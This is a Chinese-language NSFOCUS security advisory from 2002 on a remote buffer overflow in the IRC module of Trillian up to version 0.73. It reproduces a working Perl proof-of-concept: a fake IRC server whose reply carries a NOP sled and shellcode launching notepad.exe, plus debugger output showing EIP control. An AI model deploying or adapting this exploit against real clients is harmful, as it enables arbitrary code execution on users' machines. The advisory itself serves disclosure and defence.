首页 -> 安全研究
安全研究
安全漏洞
Trillian IRC模块处理服务器应答远程缓冲区溢出漏洞
发布日期:2002-07-31
更新日期:2002-08-09
受影响系统:
Cerulean Studios Trillian 0.73描述:
Cerulean Studios Trillian 0.725
Cerulean Studios Trillian 0.6351
BUGTRAQ ID: 5373
Trillian是一款整合了ICQ、MSN Messenger、Yahoo Messenger、AOL Instant Messenger、IRC的软件,其中包含IRC模块可以进行Internet Relay聊天。
Trillian中的IRC模块对服务器应答消息缺少正确的边界长度检查,远程攻击者可以利用这个漏洞进行远程缓冲区溢出攻击。
攻击者可以发送精心构建的服务器方应答消息,导致Trillian中的IRC模块产生缓冲区溢出,可能使其以Trillian中IRC模块进程的权限在系统中执行任意指令。
<*来源:John C. Hennessy (johnh@charm.net)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=102823907410972&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/local/bin/perl
#---------------------sicillian.pl------------------------
#- Proof of concept exploit for trillians irc module.
#- Tested on trillian 0.73 but i suspect all version
#- prior maybe exploited as well.
#-
#- John C. Hennessy (Information security analyst)
#------------------------------------------------------
use Socket;
$|=1;
#egg written by UNYUN (http://www.shadowpenguin.org/)
$egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";
$buf = "\x90" x 174;
$buf .= $egg;
$buf .= "\x41\x41\x41\x41";
my $host = inet_aton("127.0.0.1");
my $proto = getprotobyname("tcp");
my $port = 6667;
my $add_port = sockaddr_in($port,$host);
my $ser_sock = socket(SOCKET,PF_INET,SOCK_STREAM,$proto) or die "Cannot open Socket: $!";
bind(SOCKET,$add_port) or die "\nCould\'t bind to port $port : $!\n ";
my $connection = listen(SOCKET,5) or die "Could't listen on $port: $! \n";
while(accept(CLIENT,SOCKET)){
print CLIENT "PING :1986115026\r\n001 :irc.random.org trillian :$buf\r\n";
}
close(SOCKET);
##########Snippet from debugger##########
# Access violation - code c0000005 (first chance)
# eax=00000000 ebx=022738c8 ecx=100446d0 edx=00000901 esi=02274e60 edi=022738c8
# eip=41414141 esp=0012ca58 ebp=01283718 iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
# 41414141 ?? ???
#####################################
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 暂时没有合适的临时解决方法。
厂商补丁:
Cerulean Studios
----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.ceruleanstudios.com/
浏览次数:2847
严重程度:0(网友投票)
绿盟科技给您安全的保障